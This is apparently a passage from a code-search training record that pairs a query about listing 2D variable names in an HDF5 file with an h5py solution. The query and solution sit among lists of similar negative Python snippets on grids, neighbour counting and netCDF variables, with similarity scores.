replace with your code\n return 0", "def count_ones(self):\r\n count = 0\r\n for x in range(self.xspan):\r\n for y in range(self.yspan):\r\n if (self.cells[x][y] == 1):\r\n count = count + 1\r\n return count", "def figure_out_grid(tot):\n guess = np.round(np.sqrt(tot))\n\n dims = [guess,guess]\n\n flag = True\n\n while(flag):\n if dims[0]*dims[1] < tot:\n dims[0] += 1\n flag = True\n elif dims[0]*dims[1] >tot and dims[0]*dims[1] <(tot-dims[1]):\n dims[0] -= 1\n flag = True\n else:\n flag = False\n return tuple(dims)", "def get_number_neighbours_of_cell(self, x_cell, y_cell):\n alive_neighbours = 0\n \n # neighbour indices\n x_indices = [x_cell-1, x_cell, x_cell+1]\n y_indices = [y_cell-1, y_cell, y_cell+1]\n\n\n #TODO: use functional programming ^^^^^^\n #x_indices = list(filter(lambda x: x < 0 and x > self.size[0], x_indices))\n #y_indices = list(filter(lambda y: y < 0 and y > self.size[1], y_indices))\n \n # correct indices for cell neighbours based on wrap_around_borders\n #TODO: this so far only works for x,y same size..\n if self.wrap_around_borders:\n for indices in [x_indices, y_indices]:\n if -1 in indices:\n indices.remove(-1)\n indices.append(self.board_size[0] - 1)\n if self.board_size[0] in indices:\n indices.remove(self.board_size[0])\n indices.append(0)\n else:\n for indices in [x_indices, y_indices]:\n if -1 in indices:\n indices.remove(-1)\n if self.board_size[0] in indices:\n indices.remove(self.board_size[0])\n\n # check each neighbour status and add to counter\n for x in x_indices:\n for y in y_indices:\n alive_neighbours = alive_neighbours + self.board_state[x][y]\n\n # dont count own value\n alive_neighbours = alive_neighbours - self.board_state[x_cell][y_cell]\n\n return alive_neighbours", "def compute_nrows_ncolumns(nplots):\n n_rows = int(np.sqrt(nplots)) + (np.sqrt(nplots) != int(np.sqrt(nplots))) * 1\n n_columns = int(nplots / n_rows) + (nplots / n_rows != int(nplots / n_rows)) * 1\n return n_rows, n_columns", "def neighbor(board, x, y, n, m):\n deltas = (\n (-1, -1), (-1, 0), (-1, 1),\n (0, -1), (0, 1),\n (1, -1), (1, 0), (1, 1),\n )\n count = 0\n for dx, dy in deltas:\n xx = x + dx\n yy = y + dy\n if xx >= 0 and xx < n and yy >= 0 and yy < m and board[xx][yy] % 2 == 1:\n count += 1\n\n return count", "def countNeighbors(row, col, A):\n h = len(A)\n w = len(A[0])\n count = 0\n for x in range(-1, 2, 1):\n for y in range(-1, 2, 1):\n if abs(x) + abs(y) != 0:\n count += A[row+x][col+y]\n return count", "def __len__(self):\n return len(self._grid)", "def recursive_grid_count(x, y):\n if x < 1 or y < 1:\n raise ValueError(\"Invalid input\")\n if x == 1 and y == 1:\n return 1\n if x == 1:\n return recursive_grid_count(x, y-1) + y\n if y == 1:\n return recursive_grid_count(x-1, y) + x\n return recursive_grid_count(x-1, y) + recursive_grid_count(x, y-1) - recursive_grid_count(x-1, y-1) + x * y", "def calc_grid(self):\n return int(self._posn.x / cell_size), int(self._posn.y / cell_size)", "def plaquette_rows_cols(self):\n return len(self.minor_yvals()), len(self.minor_xvals())", "def island_perimeter(grid):\n count = 0\n for row in grid:\n size = len(row)\n row.insert(0, 0)\n row.append(0)\n grid.insert(0, [0 for x in range(size + 2)])\n grid.append([0 for x in range(size + 2)])\n\n for e, row in enumerate(grid):\n for i, num in enumerate(row):\n if num == 1:\n if grid[e][i - 1] != 1:\n count += 1\n if grid[e][i + 1] != 1:\n count += 1\n if grid[e - 1][i] != 1:\n count += 1\n if grid[e + 1][i] != 1:\n count += 1\n return count", "def island_perimeter(grid):\n total = 0\n 
for x in range(0, len(grid)):\n for y in range(0, len(grid[0])):\n if grid[x][y] == 1:\n if x == 0 or grid[x - 1][y] == 0:\n total += 1\n if x == len(grid) - 1 or grid[x + 1][y] == 0:\n total += 1\n if y == len(grid[0]) - 1 or grid[x][y + 1] == 0:\n total += 1\n if y == 0 or grid[x][y - 1] == 0:\n total += 1\n return total", "def compute_num_tracks(x_offset: int, y_offset: int,\n x: int, y: int, track_info: Dict[int, int]):\n x_diff = x - x_offset\n y_diff = y - y_offset\n result = 0\n for length, num_track in track_info.items():\n if x_diff % length == 0 and y_diff % length == 0:\n # it's the tile\n result += num_track\n return result", "def island_perimeter(grid):\n count = 0\n for j, r in enumerate(grid):\n for i, c in enumerate(r):\n if c == 1:\n if j == 0 or grid[j - 1][i] == 0:\n count += 1\n if i == 0 or grid[j][i - 1] == 0:\n count += 1\n if j == len(grid) - 1 or grid[j + 1][i] == 0:\n count += 1\n if i == len(r) - 1 or grid[j][i + 1] == 0:\n count += 1\n return count", "def count_alive_cells(self, x, y):\n\n # indices of surrounding cells.\n ul = max(y - 1, 0) # upper left\n ur = min(y + 2, self.f_shape[1]) # upper right\n bl = max(x - 1, 0) # bottom left\n br = min(x + 2, self.f_shape[0]) # bottom right\n\n # slice\n cells = self.cells[bl:br, ul:ur]\n n_cells = np.count_nonzero(cells)\n\n return n_cells - self.cells[x][y]", "def in_grid(self, tile):\n return 0 <= tile[0] < self.gs[0] and 0 <= tile[1] < self.gs[1]", "def island_perimeter(grid):\n\n counter = 0\n for i in range(len(grid)):\n for j in range(len(grid[i])):\n if (grid[i][j] == 1):\n if ((j + 1) == len(grid[i]) or (grid[i][j + 1] == 0)):\n counter += 1\n if ((j - 1) < 0 or (grid[i][j - 1] == 0)):\n counter += 1\n if ((i + 1) == len(grid) or (grid[i + 1][j] == 0)):\n counter += 1\n if ((i - 1) < 0 or (grid[i - 1][j] == 0)):\n counter += 1\n return counter", "def num_nodes(self):\n return self._grid", "def getNumCleanedTiles(self):\n tilesCopy = {}\n tilesCopy = self.tiles.copy()\n numCleanTiles = 0\n \n for posTupleKey, posVal in tilesCopy.items():\n if posVal == 1:\n numCleanTiles += 1\n return numCleanTiles\n #raise NotImplementedError", "def score(grid):\n result = 0\n for r in range(WORLD_WIDTH):\n for c in range(WORLD_WIDTH):\n if grid[r, c] != DIRT:\n result += 1\n return result", "def mapSize(self):\n return len(self._cells)", "def countNeighbors(oldgen, x, y):\n temp = 1\n\n count = 0\n for i in range(-1, 2):\n for j in range(-1, 2):\n\n # TODO: this needs rewritin to be more understandable\n if not (i == 0 and j == 0):\n count += int(oldgen[(x + i + WID) % WID][(y + j + HGT) % HGT])\n\n for i in range(-1, 2):\n for j in range(-1, 2):\n temp += 1\n\n count -= int(oldgen[x][y])\n\n return count", "def part1(mem):\n return len(paint_panels(mem, 0))", "def is_in_the_grid(self, row: int, col: int) -> bool:\n return 0 <= row < self.n_row and 0 <= col < self.n_col", "def island_perimeter(grid):\n\n count = 0\n\n for i in range(len(grid)):\n for j in range(len(grid[0])):\n mul = 4\n if grid[i][j] == 1:\n if j < len(grid[0]) - 1:\n if grid[i][j + 1] == 1:\n mul -= 1\n if grid[i][j - 1] == 1 and j > 0:\n mul -= 1\n if i < len(grid) - 1:\n if grid[i + 1][j] == 1:\n mul -= 1\n if grid[i - 1][j] == 1 and i > 0:\n mul -= 1\n else:\n continue\n count += mul\n return count", "def get_length(board):\n length = 0\n for i in range(n):\n for j in range(n):\n length += len(board[i][j])\n return length", "def _get_dimensions(self):\n corners = []\n for module in self.modules:\n for tile in module:\n corners.append(tile.corner_idx)\n 
corners.append(tile.opp_corner_idx)\n corners = np.stack(corners)\n\n # Find extremes\n min_yx = corners.min(axis=0)\n max_yx = corners.max(axis=0)\n\n size = max_yx - min_yx\n centre = -min_yx\n return tuple(size), centre", "def get_number_of_rows_and_columns(m):\n\n r = int(np.sqrt(m))\n c = m // r if np.mod(m, r) == 0 else m // r + 1\n return r, c", "def expected_width(self):\n\t\treturn self.expected_tile_width * TILE_SIZE", "def nNx(self):\n return self.nCx + 1", "def count_num_empty_tiles_not_masked(subgrid):\n\n\tnum_empty_tiles_not_masked = 0\n\tfor tile in subgrid:\n\t\tif tile == MaskedTile.EMPTY:\n\t\t\tnum_empty_tiles_not_masked += 1\n\n\treturn num_empty_tiles_not_masked", "def getDims(img):\n n,m,k = np.shape(img) \n N,M = 0,0\n for i in range(1,n):\n if np.array_equal(img[i],img[i-1]):\n N += 1\n for j in range(1,m):\n if np.array_equal(img[:,j],img[:,j-1]):\n M += 1\n return N,M,n,m", "def tileWidth(self):\n return self._tileWidth", "def dimension(self):\r\n a = 0\r\n for x in self.faces():\r\n if (len(x) > a):\r\n a = len(x) \r\n return a-1", "def count_cells(rule, n=500):\n ca = Cell1D(rule, n)\n ca.start_single()\n\n res = []\n for i in range(1, n):\n cells = np.sum(ca.array)\n res.append((i, i**2, cells))\n ca.step()\n\n return res", "def get_map_size(self, map_major_dim=None):\n w, h = self.img_size\n mmd = map_major_dim\n if w >= h:\n x_tiles = mmd\n y_tiles = round(h / w * mmd)\n else:\n x_tiles = round(w / h * mmd)\n y_tiles = mmd\n\n return (x_tiles, y_tiles)", "def test_can_traverse_tall_grid(self):\n grid = [\n [\"0\"],\n [\"1\"],\n [\"1\"],\n [\"0\"],\n [\"1\"],\n [\"0\"],\n [\"1\"],\n [\"0\"],\n [\"1\"],\n ]\n result = num_islands(grid)\n self.assertEqual(result, 4)", "def numTilePossibilities(self, tiles: str) -> int:\n def generate(tiles: str, length: int) -> int:\n count = 0\n for i, symbol in enumerate(tiles):\n if i and tiles[i - 1] == symbol:\n continue\n if length > 1:\n count += generate(tiles[:i] + tiles[i+1:], length - 1)\n else:\n count += 1\n return count\n \n count = 0\n tiles = ''.join(sorted(tiles))\n for i in range(len(tiles)):\n count += generate(tiles, i + 1)\n return count" ]
[ "0.83870953", "0.82873094", "0.8044176", "0.80318546", "0.7763642", "0.7731704", "0.75307924", "0.7150116", "0.70772505", "0.7041915", "0.6943248", "0.6927167", "0.6907514", "0.68812686", "0.6836811", "0.67657024", "0.6740372", "0.6629903", "0.6573289", "0.65704787", "0.65530694", "0.6545329", "0.6480006", "0.64734304", "0.6468995", "0.64498883", "0.6441541", "0.6426244", "0.6425113", "0.6425113", "0.64238167", "0.63638705", "0.635766", "0.6348827", "0.634662", "0.63449895", "0.6340491", "0.6335841", "0.633221", "0.63279456", "0.6309132", "0.63068473", "0.6305959", "0.630252", "0.6302096", "0.6291851", "0.6287323", "0.62860453", "0.62832475", "0.6282118", "0.62810695", "0.6280342", "0.62773013", "0.62718225", "0.62678534", "0.62447673", "0.623512", "0.6233805", "0.6231677", "0.6216362", "0.6205091", "0.61979103", "0.6189771", "0.61827654", "0.61802167", "0.61672246", "0.6157363", "0.61445576", "0.6134287", "0.61298674", "0.6128402", "0.61208767", "0.6107936", "0.6090788", "0.60880023", "0.6084285", "0.60832566", "0.608247", "0.60775775", "0.607753", "0.6073784", "0.60663664", "0.6052028", "0.6044756", "0.60434043", "0.60430515", "0.6042081", "0.6040847", "0.6038589", "0.60340166", "0.6032884", "0.603026", "0.6029441", "0.6025336", "0.60234535", "0.60215026", "0.6019526", "0.6010269", "0.60081524", "0.6007937" ]
0.77562994
5
Return all 2d '/variable' names in the HDF5.
def get_grid_names(fname):\n    with h5py.File(fname, 'r') as f:\n        vnames = [k for k in f.keys() if f[k].ndim == 2]\n    return vnames
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def data_variable_names(self):\n data_names = []\n mesh = self.mesh_names()\n prefix = mesh[0]+'_'\n for vname in self.nc.variables.keys():\n if vname.startswith(prefix):\n if self.nc.dimensions.has_key(vname):\n continue\n if hasattr(self.nc.variables[vname],'cf_role'):\n continue\n data_names.append( vname[len(prefix):] )\n return data_names", "def variable_names(self):\n \n return [x['variable'] for x in self.variable_dicts()]", "def variables_used (self) :\r\n\t\t## These names do not contain dimension specification (everything in brackets\r\n\t\t## that comes after a name is am array index - either the arry was declared\r\n\t\t## correctly or it is wrong anyway, there is no implicit declaration of arrays) !\r\n\r\n\t\tresult = []\r\n\r\n\t\tfor l in self.equ_lists :\r\n\t\t\tfor var_name in l :\r\n\t\t\t\tresult.append(var_name[0])\r\n\t\treturn result", "def get_variable_names(self):\n return [var[1] for var in self.variables]", "def getOthVarNames( self ):\n\n if self.othVarNames:\n return self.othVarNames.keys()\n\n n = self.adb.get( \"nOthVars\" )\n for indx in range( n ):\n name = self.adb.get( \"othVarName\",\n indx ) \n self.othVarNames[ name ] = indx\n\n return self.othVarNames.keys()", "def get_node_variable_names(self):\n return [b\"\".join(_i).strip().decode()\n for _i in self._f.variables[\"name_nod_var\"][:]]", "def getOhcVarNames( self ):\n\n if self.ohcVarNames:\n return self.ohcVarNames.keys()\n \n n = self.adb.get( \"nOhcVars\" )\n for indx in xrange( n ):\n name = self.adb.get( \"ohcVarName\",\n indx ) \n self.ohcVarNames[name] = indx\n\n return self.ohcVarNames.keys()", "def variables_used (self) :\r\n\t\t## These names possibly contain dimension specification!\r\n\t\treturn self.variable_names", "def read_hdf5_group(filename, gname, vars_name=None):\n fid = h5py.File(filename, 'r')\n gid = fid.get(gname)\n if vars_name is None: vars_name = list(gid.keys())\n\n data = {}\n for var_name in vars_name:\n try:\n dset = gid.get(var_name)\n shape = dset.shape\n data[var_name] = np.zeros(shape)\n dset.read_direct(data[var_name])\n except:\n pass\n fid.close()\n print('Read from ', ''.join((filename,'/',gname)))\n print('Variables names = ')\n print('\\n'.join(vars_name))\n\n return data, vars_name", "def getOeiVarNames( self ):\n\n if self.oeiVarNames:\n return self.oeiVarNames.keys()\n\n n = self.adb.get( \"nOeiVars\" )\n for indx in xrange( n ):\n name = self.adb.get( \"oeiVarName\",\n indx ) \n self.oeiVarNames[name] = indx\n\n return self.oeiVarNames.keys()", "def variables(model: Model) -> AbstractSet[str]:\r\n assert is_model(model)\r\n return model.keys()", "def getVariableList(dataset):\n variables = [v for v in dataset.variables.keys() if v not in dataset.dimensions.keys()]\n for d in dataset.dimensions.keys():\n try:\n variables.pop(variables.index(dataset.variables[d].getncattr(\"bounds\")))\n except:\n pass\n return variables", "def variables(model: Model) -> AbstractSet[str]:\n assert is_model(model)\n return model.keys()", "def variables(self):\n return [i.name for i in self.inputs + self.outputs]", "def get_element_variable_names(self):\n return [b\"\".join(_i).strip().decode()\n for _i in self._f.variables[\"name_elem_var\"][:]]", "def get_variable_names(self):\n return [VariableString(s) for s in\n self._design.GetVariables()+self._design.GetPostProcessingVariables()]", "def variables(self):\n return self.dataset.data_vars", "def getLinIterVarNames( self ):\n\n self.updateAdb( )\n\n return self.iterNames.keys()", "def vars(self):\n return 
[Var(i,self.dims[i]) for i in range(self.nvar)] # TODO: use stored state info (=1 sometimes)", "def getOfcVarNames( self ):\n\n if self.ofcVarNames:\n return self.ofcVarNames.keys()\n \n n = self.adb.get( \"nOfcVars\" )\n for indx in xrange( n ):\n name = self.adb.get( \"ofcVarName\",\n indx ) \n self.ofcVarNames[name] = indx\n\n return self.ofcVarNames.keys()", "def get_layer_var_names(self):\n return(self.params)", "def get_all_variables_names(self):\n return self.project.get_variable_names() + self.design.get_variable_names()", "def getResRatioVarNames( self ):\n\n self.updateAdb( )\n\n return self.resNames.keys()", "def getOriVarNames( self ):\n\n if self.oriVarNames:\n return self.oriVarNames.keys()\n\n n = self.adb.get( \"nOriVars\" )\n for indx in xrange( n ):\n name = self.adb.get( \"oriVarName\",\n indx ) \n self.oriVarNames[name] = indx\n\n return self.oriVarNames.keys()", "def getDataVariableNames(self, product):\r\n return []", "def getDataVariableNames(self, product):\r\n\r\n h = product.getSceneRasterHeight()\r\n\r\n # 10m resolution\r\n if h == 10980:\r\n return self.return_available_variables(product, DATA_VARIABLE_NAMES_10m)\r\n\r\n # 20m resolution\r\n elif h == 5490:\r\n return self.return_available_variables(product, DATA_VARIABLE_NAMES_20m)\r\n\r\n # 20m resolution\r\n elif h == 1830:\r\n return self.return_available_variables(product, DATA_VARIABLE_NAMES_60m)", "def getSolRatioVarNames( self ):\n\n self.updateAdb( )\n\n return self.solNames.keys()", "def get_variable_names(filepath):\n variables = set()\n with open(filepath, \"r\") as f:\n previous = \"\"\n for line in f.readlines():\n if line[0] == \"#\":\n previous = line\n var_names = None\n continue\n if var_names is not None:\n continue\n var_names = previous.split()[1:]\n while \"vs\" in var_names:\n var_names.remove(\"vs\")\n for name in var_names:\n variables.add(name)\n return list(variables)", "def get_variable_attributes(model_data, header, variable, variable_name):\n header.append('# {}_column: {}\\n'.format(variable, variable_name))\n for attr, value in vars(model_data.variables[variable]).items():\n if '_range' in attr:\n header.append('# {}_{}: {},{}\\n'.format(variable, attr, value[0], value[1]))\n else:\n header.append('# {}_{}: {}\\n'.format(variable, attr, value))\n return header", "def get_variables(self) -> np.array:\n pass", "def get_variable_names(self):\n varNames = []\n for var in self.variables:\n # EstimationVariable\n varNames.append(var.name)\n return varNames", "def getOqiVarNames( self ):\n\n if self.oqiVarNames:\n return self.oqiVarNames.keys()\n\n n = self.adb.get( \"nOqiVars\" )\n for indx in xrange( n ):\n name = self.adb.get( \"oqiVarName\",\n indx ) \n self.oqiVarNames[name] = indx\n\n return self.oqiVarNames.keys()", "def read_h5(self):\n infile = h5py.File(self.inf_name,'r')\n\n vardict = self.labdict\n #store data with the correct labels\n for k in infile['plasma/1d'].keys():\n try:\n vardict[k] = infile[self.labdict[k]].value\n except:\n vardict[k] = []\n\n vardict['a_ions']=infile['/plasma/anum'].value\n vardict['znum']=infile['/plasma/znum'].value\n \n\n self.rho_in = vardict['rho']\n self._rho_vol = infile['distributions/rhoDist/abscissae/dim1'].value[1:]\n self._volumes = infile['distributions/rhoDist/shellVolume'].value\n self.nrho_in = np.size(self.rho_in)\n\n if vardict['a_ions'][0]!='/':\n self.nspec = len(vardict['a_ions'])\n else:\n self.nspec = vardict['ni'].shape[1]\n print(\"Number of ions: \", self.nspec)\n if len(vardict['a_ions'])!=len(vardict['znum']):\n 
print(\"ERROR! array of A and Z don't have the same length\")\n\n self.A = vardict['a_ions']\n self.Z = vardict['znum']\n self.nion = self.nspec\n \n self.te_in = vardict['te'][:]\n self.ne_in = vardict['ne'][:]\n self.ti_in = vardict['ti'][:]\n ni1_in = vardict['ni'][:,0]\n self.ni_in = np.zeros((self.nion, self.nrho_in),dtype=float)\n self.ni_in[0,:] = ni1_in\n if self.nion==2:\n ni2_in = vardict['ni'][:,1]\n self.ni_in[1,:] = ni2_in\n elif self.nion==3:\n ni2_in = vardict['ni'][:,1]\n ni3_in = vardict['ni'][:,2]\n self.ni_in[1,:] = ni2_in\n self.ni_in[2,:] = ni3_in\n\n try:\n self.vt_in = vardict['vtor']\n except:\n self.vt_in = np.zeros(self.nrho_in,dtype=float)\n\n try:\n self.zeff_in = vardict['zeff'][:]\n except:\n self.zeff_in = np.zeros(self.nrho_in,dtype=float)\n\n self.ni = np.zeros((self.nion, self.nrho),dtype = float)\n self.spline()", "def get_2Darray_hdf5(file,cols='Null',nrows='Null',verbose=False):\n if verbose:\n print (\"reading data from hdf5 file {} for filters:\".format(file))\n for col in cols:\n print(col)\n df = pd.read_hdf(file,\"df\")\n smalldf = df.loc[:,cols]\n outarray = smalldf.values #if we switch to pandas 0.24 or higher\n #this could be replaced with smalldf.to_numpy()\n return outarray", "def keys(self):\n keys = set()\n with pd.HDFStore(self.rootpath, mode=\"r\") as hdf:\n hdf5_keys = hdf.keys()\n\n for key in hdf5_keys:\n kp = key.split(\"/\")\n if len(kp) == 5:\n print(kp, len(kp))\n keys.add(kp[4])\n return list(keys)", "def getGridFilenames(self):\n c = list(self.gridVars.keys())\n return self.gridVars[c[0]]", "def get_vars_header(lfile):\n # Get variable list\n vlist = []\n with open(lfile) as fh:\n for line in fh:\n vlist.append(line.split()[-1])\n # Get extension\n ext = \".h5\"\n if vlist[0] == \"ASCII\":\n ext = \".csv\"\n elif vlist[0] == \"HDF5\":\n ext = \".h5\"\n else: # Unsupported type\n pass\n return vlist[1:], ext # First line is a header line of sorts", "def variables(self):\n return [term.variable for term in self.terms]", "def labels(self):\n with self._h5file('r') as h5file:\n return list(h5file.keys())", "def get_data_hdf(file):\n data = {}\n\n def func(name, dset):\n if not hasattr(dset, 'shape'):\n return # not array, can't be image\n if isinstance(dset, h5py.Dataset):\n data[dset.name] = dset.name\n\n file_h5 = h5py.File(file, 'r')\n file_h5.visititems(func)\n return file_h5, data", "def read_vs_1d(vname, depth): \n with open(vname, 'r') as f:\n lines = f.readlines() \n line0=lines[0].split()\n n_col = int(line0[0])\n \n data = []\n\n for line in lines[1:]:\n data.append([float(val) for val in line.split()])\n\n data = np.concatenate(data) \n v_mod = data.reshape([n_col,6])\n \n depth_ref = 0\n for i in range(0, n_col):\n depth_ref = depth_ref+v_mod[i,0]\n #print(depth_ref)\n if(depth_ref>depth):\n vs_1d = v_mod[i-1,2]\n rho_1d = v_mod[i-1,3] \n break\n \n return vs_1d, rho_1d", "def get_name_list(msh, varname):\n return [str(chartostring(v)) for v in msh.variables[varname]]", "def getSensorVariableNames(self, product):\r\n\r\n return []", "def list_of_vars_in_e3sm_diags():\n\n # Get all of the 'variables' parameter from each file.\n vars_used = []\n try:\n logger.info(\"Using user arguments.\")\n parameters = get_parameters(parser)\n except Exception as e:\n logger.error(e)\n # Looks for these files in their installed location.\n pth = os.path.join(e3sm_diags.INSTALL_PATH)\n # The first '*' is the folder of the set, the second is the actual file.\n # Ex: {e3sm_diags.INSTALL_PATH}/lat_lon/lat_lon_model_vs_obs.cfg\n file_paths = 
[p for p in glob.glob(pth + \"*/*.cfg\")]\n # NOT NEEDED:\n # parser.add_argument('path') # Needed so the filename can be passed in.\n # parser.add_args_and_values([DUMMY_FILE_PATH])\n parameters = parser.get_cfg_parameters(\n files_to_open=file_paths, check_values=False\n )\n\n for p in parameters:\n logger.info(f\"p.variables {p.variables}\")\n vars_used.extend(p.variables)\n\n logger.info(f\"Variables used: {sorted(list(set(vars_used)))}\")\n return set(vars_used)", "def get_output_names(hf):\n return sorted(map(str, hf['/output/data'].keys()))", "def variables(self):\n return [i for (i, j) in self.qubo.keys() if i == j]", "def getSensorVariableNames(self, product):\r\n return []", "def read_data(path):\n with h5py.File(path, 'r') as hf:\t\n input_ = np.array(hf.get('input'))\n label_ = np.array(hf.get('label'))\n return input_, label_", "def variables(self):\r\n return self.get_field('variable')", "def list(self):\n if self.handle == None: return []\n return self.handle.variables.keys()", "def read_hdf5(ID_images:str, path:str = \"data/dataset/\"):\n images, labels = [], []\n\n #open the HDF5 file\n file = h5py.File(path +ID_images+\"_lens.h5\", \"r\")\n\n images = np.array(file[\"/images\"]).astype(\"float64\")\n labels = pd.read_hdf(path +ID_images+'_meta.h5', \"table\")\n\n return images, labels", "def globvardimvals(tmpl, valuesdict,sufs=['.001.001.meta', '.meta']):\n # remove formats: {xx:yy} -> {xx}\n tmpl = re.sub(r'{([^:}]*)(:[^}]*)?}', r'{\\1}', tmpl)\n\n fields = list(set(re.findall(r'{([^}]*)}', tmpl)))\n vardims = [k for k in fields if k.startswith('v')]\n vardims.sort()\n knownvars = dict((k,v) for k,v in valuesdict.items() if k in vardims)\n knownvardims = [ k for k in vardims if k in knownvars ]\n knownvarvals = [ knownvars[k] for k in knownvardims ]\n knownvarlens = [ len(v) for v in knownvarvals ]\n unknownvardims = [ k for k in vardims if not k in knownvars ]\n\n fixdims = [k for k in fields if not k.startswith('v')]\n fixdims.sort()\n\n # just pick actual fields\n known = dict((k,v) for k,v in valuesdict.items() if k in fields)\n knowndims = dict((k,v) for k,v in known.items() if k not in vardims)\n # first known value for each field\n firstdims = dict((k,v[0]) for k,v in knowndims.items())\n\n if 'vars' in valuesdict:\n # list of variable value tuples\n # must be all variables; will ignore other v0=... 
settings\n varvals = valuesdict['vars']\n else:\n knownvarindices = np.indices(knownvarlens)\n varvals = []\n for vi in zip(*[x.flat for x in knownvarindices]):\n varval = tuple(v[i] for v,i in zip(knownvarvals,vi))\n varvals.append(varval)\n\n dimvals = {}\n\n unknown = set(fields) - set(known)\n if unknown:\n replaceknown = dict((k,'{'+k+'}') for k in fields)\n for k,v in firstdims.items():\n replaceknown[k] = v\n\n for knownvarval in varvals:\n vars = dict(zip(knownvardims, knownvarval))\n replaceknown.update(vars)\n\n unknowntmpl = tmpl.format(**replaceknown)\n\n globpatt = re.sub(r'{[^}]*}', '*', unknowntmpl)\n for suf in sufs:\n metafiles = glob(globpatt + suf)\n if len(metafiles):\n break\n else:\n raise IOError(globpatt + suf)\n\n unknowndims = [k for k in unknown if not k.startswith('v')]\n regexp,parts,keys = format2re(unknowntmpl + suf)\n vals = {}\n for metafile in metafiles:\n g = re.match(regexp,metafile).groups()\n d = dict(zip(keys,g))\n varval = tuple(d[k] for k in unknownvardims)\n if varval not in vals:\n vals[varval] = dict((k,set()) for k in unknowndims)\n for k,v in zip(keys,g):\n if not k.startswith('v'):\n vals[varval][k].add(v)\n\n for unknownvarvals,vs in vals.items():\n unknownvars = dict(zip(unknownvardims,unknownvarvals))\n vars.update(unknownvars)\n varval = tuple(vars[k] for k in vardims)\n dimvals[varval] = dict((k,sorted(list(s))) for k,s in vs.items())\n dimvals[varval].update(knowndims)\n else:\n dimvals = dict.fromkeys(varvals, knowndims)\n \n # res: (v0,v1) -> {'d0':['a','b','c'], 'd1':[0,1,2], ...}\n return vardims,fixdims,dimvals", "def extract_2d_var(self,varname,file_idx):\n if varname in self.predictors:\n file = self.predictor_inventory[varname]['files'][file_idx]\n elif varname in self.predictands:\n file = self.predictand_inventory[varname]['files'][file_idx]\n else:\n raise ValueError(f'{varname} not a predictor or predictand') \n \n return Dataset(file).variables[varname][:]", "def read_data(path):\n with h5py.File(path, 'r') as hf:\n data = np.array(hf.get('data'))\n label = np.array(hf.get('label'))\n\n data, label=data[:,:,:,0:2], label[:,:,:,0]\n #data=np.expand_dims(data,axis=-1)\n label=np.expand_dims(label,axis=-1)\n\n return data, label", "def variables(self):\n return {u for u in self if u.type == 'var'}", "def get_layers(t_vars):\n if TfUtils._is_op_defined(t_vars):\n return [t_var.name for t_var in t_vars][: len(t_vars) // 2 ]\n return get_unique([t_var.name.split(\"/\")[0] for t_var in t_vars if \"/\" in t_var.name])", "def getVariables(self):\n statVars = [self[vn] for vn in self.statVars]\n timeVars = [self[vn] for vn in self.timeVars]\n return statVars + timeVars", "def getIndVarsTable(self, omitTheseIndVars=()):\n assert all([indVar in self.indVars for indVar in omitTheseIndVars]), \\\n \"Can't omit an indVar that is not a proper indVar!\"\n\n result = []\n for indVar in self.indVars:\n if indVar not in omitTheseIndVars:\n result.append(self.h5file[indVar])\n #returning a tuple prevents inadvertent mutating of the result\n return tuple(result)", "def extract_h5(args, var, data, lfile):\n import h5py\n import numpy as np\n try:\n raw = h5py.File(lfile, 'r')\n except:\n print(\"Error: File could not be read: \" + lfile)\n return\n # Get time\n time = np.array(raw['sys.exec.out.time'])\n # Get data\n for v in var:\n if v not in data: # havent extracted yet\n if v in raw:\n data[v] = np.array(raw[v])\n else:\n # if args.verbose :\n # print \"Warning: \" + v + \" not found in \" +\n # os.path.basename(lfile)\n continue\n else:\n 
continue # already extracted\n raw.close()\n return data, time", "def get_keys(self, file_name):\n\n nc = Dataset(file_name)\n keylist = []\n for key in nc.variables.keys():\n if ((not key == \"time\") and (not key == \"grid\")):\n keylist.append(key)\n\n nc.close()\n return keylist", "def variables(self):\n return np.array(list(self._match_result_dict.keys()))", "def get_global_variable_names(self):\n return [b\"\".join(_i).strip().decode()\n for _i in self._f.variables[\"name_glo_var\"][:]]", "def printvarindex(fname):\n cursor = eplussql.getcursor(fname)\n mtx1 = eplussql.get_varindex(cursor)\n mtx2 = [[str(item) for item in row] for row in mtx1]\n mtx3 = [','.join(row) for row in mtx2]\n for row in mtx3:\n print row", "def values(self):\n vals = []\n narrays = self.VTKObject.GetNumberOfArrays()\n for i in range(narrays):\n a = self.VTKObject.GetAbstractArray(i)\n if a.GetName():\n vals.append(a)\n return vals", "def read_nc_var(nc_file, var_name, var_date_name):\n \n fh = Dataset(nc_file, mode='r')\n var = fh.variables[var_name][:]\n var_dates = fh.variables[var_date_name][:]\n \n print(var_name,': ', var.shape)\n print(var_date_name,': ', var_dates.shape)\n \n return var, var_dates;", "def names(self):\n labels = [\n \"$X_{%i}$\" % i if d.name is None else d.name\n for i, d in enumerate(self.dimensions)\n ]\n return labels", "def variables(self):\n for name in self._nodes:\n if isinstance(self._nodes[name], RandomVariable):\n yield name", "def stats_variable_names(res):\n def varname(s):\n pos = s.find(':')\n return s if pos==-1 else s[0:pos]\n return set( [ varname(key) for key in res.keys()] )", "def mesh_names(self):\n meshes = []\n for vname in self.nc.variables.keys():\n try:\n if self.nc.variables[vname].cf_role == 'mesh_topology':\n meshes.append(vname)\n except AttributeError:\n pass\n return meshes", "def varNames(self):\n return self.__varNames", "def variable_names(self):\n\n status, stdout, stderr = self.__xcall__(['--print-variables'])\n\n if status != 0:\n raise RuntimeError(\"error querying --print-variables for package `%s': %s\" % (self.name, stderr))\n\n return stdout.strip().split()", "def getMaskVariableNames(self, product):\r\n\r\n h = product.getSceneRasterHeight()\r\n\r\n # 10m resolution\r\n if h == 10980:\r\n return self.return_available_variables(product, MASK_VARIABLE_NAMES_10m)\r\n\r\n # 20m resolution\r\n elif h == 5490:\r\n return self.return_available_variables(product, MASK_VARIABLE_NAMES_20m)\r\n\r\n # 20m resolution\r\n elif h == 1830:\r\n return self.return_available_variables(product, MASK_VARIABLE_NAMES_60m)", "def variables_used (self) :\r\n\t\treturn [i[0] for i in self.parameters]", "def var_names(self):\n return self._var_names", "def get_mds_dimension_names(node):\n ndims=len(get_mds_shape(node))\n own_name=get_mds_shortname(node)\n dimension_names=[]\n for i in range(ndims):\n dimension=node.dim_of(i)\n try:\n name=get_mds_shortname(get_mds_node_reference(dimension))\n if len(get_mds_shape(dimension))>1:\n name=name+\"_index\"\n except:\n name=own_name+\"_index\"\n dimension_names.append(name)\n return dimension_names", "def getVariableNames(self, product):\r\n\r\n variable_names = self.getDataVariableNames(product) + \\\r\n 